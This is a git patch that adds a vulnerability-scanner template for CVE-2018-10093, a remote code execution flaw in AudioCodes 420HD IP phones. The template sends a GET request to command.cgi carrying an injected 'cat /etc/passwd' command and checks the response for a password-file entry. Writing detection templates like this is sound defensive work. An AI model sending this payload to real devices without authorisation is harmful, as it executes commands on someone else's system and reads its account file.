From 98d8a15123ea72dcdab68e0700b28146985d8443 Mon Sep 17 00:00:00 2001 From: Wisnu Pramoedya <62658181+wisnupramoedya@users.noreply.github.com> Date: Mon, 18 Oct 2021 19:44:09 +0700 Subject: [PATCH] Create CVE-2018-10093.yaml --- cves/2018/CVE-2018-10093.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-10093.yaml diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml new file mode 100644 index 0000000000..94e57900ac --- /dev/null +++ b/cves/2018/CVE-2018-10093.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-10093 + +info: + name: AudioCode 400HD - RCE + author: wisnupramoedya + severity: critical + description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution. + reference: + - https://www.exploit-db.com/exploits/46164 + - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 + tags: cve,cve2018,rce,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/command.cgi?cat%20/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "admin:.*:" + + - type: status + status: + - 200